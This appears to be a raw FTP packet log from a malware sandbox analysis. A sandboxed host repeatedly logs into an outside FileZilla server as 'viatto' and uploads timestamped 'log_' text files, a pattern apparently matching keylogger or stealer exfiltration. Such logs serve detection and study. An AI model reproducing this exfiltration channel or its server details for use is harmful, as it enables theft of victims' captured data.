                                                                                                                                    Oct 10, 2022 06:03:16.084758043 CEST4993721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:16.107240915 CEST2149937185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:16.109095097 CEST4993721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:16.132003069 CEST2149937185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,137)
                                                                                                                                    Oct 10, 2022 06:03:16.156229973 CEST4993721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.59.txt
                                                                                                                                    Oct 10, 2022 06:03:16.180135965 CEST2149937185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:16.205727100 CEST2149937185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:16.388931990 CEST2149939185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:16.389010906 CEST2149939185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:16.389285088 CEST2149939185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:16.389714956 CEST4993921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:16.412408113 CEST2149939185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:16.412830114 CEST4993921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:16.435684919 CEST2149939185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:16.435977936 CEST4993921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:16.458650112 CEST2149939185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:16.459199905 CEST4993921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:16.482135057 CEST2149939185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:16.483294010 CEST4993921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:16.505908966 CEST2149939185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:16.508487940 CEST4993921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:16.531639099 CEST2149939185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,139)
                                                                                                                                    Oct 10, 2022 06:03:16.556252003 CEST4993921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.00.txt
                                                                                                                                    Oct 10, 2022 06:03:16.580708027 CEST2149939185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:16.607763052 CEST2149939185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:16.796880007 CEST2149941185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:16.796921015 CEST2149941185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:16.796932936 CEST2149941185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:16.802356958 CEST4994121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:16.825185061 CEST2149941185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:16.827545881 CEST4994121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:16.850511074 CEST2149941185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:16.850812912 CEST4994121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:16.873681068 CEST2149941185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:16.874816895 CEST4994121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:16.898112059 CEST2149941185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:16.898859024 CEST4994121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:16.922920942 CEST2149941185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:16.924218893 CEST4994121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:16.948154926 CEST2149941185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,141)
                                                                                                                                    Oct 10, 2022 06:03:16.980235100 CEST4994121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.01.txt
                                                                                                                                    Oct 10, 2022 06:03:17.005172968 CEST2149941185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:17.031925917 CEST2149941185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:17.239595890 CEST2149943185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:17.239638090 CEST2149943185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:17.239670038 CEST2149943185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:17.240010023 CEST4994321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:17.263040066 CEST2149943185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:17.272978067 CEST4994321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:17.336133957 CEST2149943185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:17.336414099 CEST4994321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:17.359296083 CEST2149943185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:17.359582901 CEST4994321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:17.382675886 CEST2149943185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:17.384493113 CEST4994321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:17.407927036 CEST2149943185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:17.409260035 CEST4994321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:17.432590961 CEST2149943185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,142)
                                                                                                                                    Oct 10, 2022 06:03:17.457890987 CEST4994321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.02.txt
                                                                                                                                    Oct 10, 2022 06:03:17.482434034 CEST2149943185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:17.511759996 CEST2149943185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:17.717571974 CEST2149945185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:17.717602015 CEST2149945185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:17.717812061 CEST2149945185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:17.727380991 CEST4994521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:17.752640963 CEST2149945185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:17.755116940 CEST4994521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:17.779953003 CEST2149945185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:17.780317068 CEST4994521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:17.803994894 CEST2149945185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:17.808423996 CEST4994521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:17.833559036 CEST2149945185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:17.835573912 CEST4994521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:17.860918045 CEST2149945185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:17.865195036 CEST4994521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:17.891993046 CEST2149945185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,143)
                                                                                                                                    Oct 10, 2022 06:03:17.920344114 CEST4994521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.03.txt
                                                                                                                                    Oct 10, 2022 06:03:17.946026087 CEST2149945185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:17.970045090 CEST2149945185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:18.162647963 CEST2149947185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:18.162702084 CEST2149947185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:18.162734985 CEST2149947185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:18.163140059 CEST4994721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:18.185878038 CEST2149947185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:18.188530922 CEST4994721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:18.211631060 CEST2149947185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:18.212343931 CEST4994721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:18.235225916 CEST2149947185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:18.238584995 CEST4994721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:18.261684895 CEST2149947185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:18.263957024 CEST4994721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:18.286971092 CEST2149947185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:18.289724112 CEST4994721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:18.312994957 CEST2149947185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,144)
                                                                                                                                    Oct 10, 2022 06:03:18.340342999 CEST4994721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.04.txt
                                                                                                                                    Oct 10, 2022 06:03:18.363352060 CEST2149947185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:18.387778997 CEST2149947185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:18.574093103 CEST2149949185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:18.574147940 CEST2149949185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:18.574181080 CEST2149949185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:18.574793100 CEST4994921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:18.597697020 CEST2149949185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:18.600440979 CEST4994921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:18.623279095 CEST2149949185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:18.634057999 CEST4994921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:18.656996965 CEST2149949185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:18.661717892 CEST4994921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:18.684932947 CEST2149949185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:18.695871115 CEST4994921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:18.719233990 CEST2149949185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:18.729595900 CEST4994921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:18.753042936 CEST2149949185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,145)
                                                                                                                                    Oct 10, 2022 06:03:18.781393051 CEST4994921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.05.txt
                                                                                                                                    Oct 10, 2022 06:03:18.804518938 CEST2149949185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:18.828921080 CEST2149949185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:19.019108057 CEST2149951185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:19.019156933 CEST2149951185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:19.019187927 CEST2149951185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:19.019905090 CEST4995121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:19.045886993 CEST2149951185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:19.047166109 CEST4995121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:19.073048115 CEST2149951185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:19.073656082 CEST4995121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:19.098038912 CEST2149951185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:19.098540068 CEST4995121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:19.122941017 CEST2149951185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:19.124718904 CEST4995121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:19.148592949 CEST2149951185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:19.149662971 CEST4995121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:19.174160957 CEST2149951185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,146)
                                                                                                                                    Oct 10, 2022 06:03:19.200412035 CEST4995121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.06.txt
                                                                                                                                    Oct 10, 2022 06:03:19.226449966 CEST2149951185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:19.251770973 CEST2149951185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:19.454668999 CEST2149953185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:19.454724073 CEST2149953185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:19.454947948 CEST2149953185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:19.455195904 CEST4995321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:19.478315115 CEST2149953185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:19.478743076 CEST4995321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:19.502039909 CEST2149953185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:19.502334118 CEST4995321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:19.525500059 CEST2149953185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:19.525990009 CEST4995321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:19.549485922 CEST2149953185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:19.550642967 CEST4995321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:19.573945999 CEST2149953185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:19.576997995 CEST4995321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:19.600809097 CEST2149953185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,148)
                                                                                                                                    Oct 10, 2022 06:03:19.632149935 CEST4995321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.07.txt
                                                                                                                                    Oct 10, 2022 06:03:19.655942917 CEST2149953185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:19.680125952 CEST2149953185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:19.886348009 CEST2149955185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:19.886406898 CEST2149955185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:19.886439085 CEST2149955185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:19.886789083 CEST4995521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:19.912276030 CEST2149955185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:19.912599087 CEST4995521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:19.937549114 CEST2149955185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:19.938644886 CEST4995521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:19.964757919 CEST2149955185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:19.965032101 CEST4995521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:19.992727995 CEST2149955185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:19.993350029 CEST4995521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:20.017993927 CEST2149955185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:20.019068956 CEST4995521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:20.046725035 CEST2149955185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,149)
                                                                                                                                    Oct 10, 2022 06:03:20.072577000 CEST4995521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.08.txt
                                                                                                                                    Oct 10, 2022 06:03:20.097841978 CEST2149955185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:20.130315065 CEST2149955185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:20.380497932 CEST2149957185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:20.380867958 CEST2149957185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:20.380986929 CEST2149957185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:20.381191015 CEST4995721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:20.404274940 CEST2149957185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:20.407731056 CEST4995721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:20.430943966 CEST2149957185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:20.431474924 CEST4995721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:20.454602957 CEST2149957185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:20.459598064 CEST4995721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:20.483139038 CEST2149957185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:20.504008055 CEST4995721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:20.527203083 CEST2149957185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:20.533199072 CEST4995721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:20.556648016 CEST2149957185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,150)
                                                                                                                                    Oct 10, 2022 06:03:20.592905045 CEST4995721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.09.txt
                                                                                                                                    Oct 10, 2022 06:03:20.616554976 CEST2149957185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:20.643501997 CEST2149957185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:21.018758059 CEST2149959185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:21.018790960 CEST2149959185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:21.018922091 CEST2149959185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:21.031961918 CEST4995921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:21.064707041 CEST2149959185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:21.066348076 CEST4995921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:21.092487097 CEST2149959185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:21.099139929 CEST4995921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:21.123830080 CEST2149959185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:21.141210079 CEST4995921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:21.167680025 CEST2149959185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:21.168256044 CEST4995921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:21.196789026 CEST2149959185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:21.197956085 CEST4995921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:21.222233057 CEST2149959185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,151)
                                                                                                                                    Oct 10, 2022 06:03:21.251303911 CEST4995921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.10.txt
                                                                                                                                    Oct 10, 2022 06:03:21.275374889 CEST2149959185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:21.300196886 CEST2149959185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:21.545850039 CEST2149961185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:21.545878887 CEST2149961185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:21.545892954 CEST2149961185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:21.546175003 CEST4996121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:21.569323063 CEST2149961185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:21.572568893 CEST4996121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:21.595839024 CEST2149961185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:21.599280119 CEST4996121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:21.622176886 CEST2149961185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:21.622710943 CEST4996121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:21.646047115 CEST2149961185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:21.646760941 CEST4996121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:21.670147896 CEST2149961185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:21.684065104 CEST4996121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:21.707679033 CEST2149961185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,153)
                                                                                                                                    Oct 10, 2022 06:03:21.732048988 CEST4996121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.11.txt
                                                                                                                                    Oct 10, 2022 06:03:21.756220102 CEST2149961185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:21.781829119 CEST2149961185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:22.008210897 CEST2149963185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:22.008248091 CEST2149963185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:22.008385897 CEST2149963185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:22.008670092 CEST4996321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:22.033430099 CEST2149963185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:22.033741951 CEST4996321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:22.059118032 CEST2149963185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:22.059449911 CEST4996321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:22.083206892 CEST2149963185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:22.083642006 CEST4996321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:22.107882023 CEST2149963185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:22.108763933 CEST4996321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:22.132348061 CEST2149963185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:22.133613110 CEST4996321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:22.157696962 CEST2149963185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,154)
                                                                                                                                    Oct 10, 2022 06:03:22.183754921 CEST4996321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.12.txt
                                                                                                                                    Oct 10, 2022 06:03:22.208904982 CEST2149963185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:22.234708071 CEST2149963185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:22.428880930 CEST2149965185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:22.429079056 CEST2149965185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
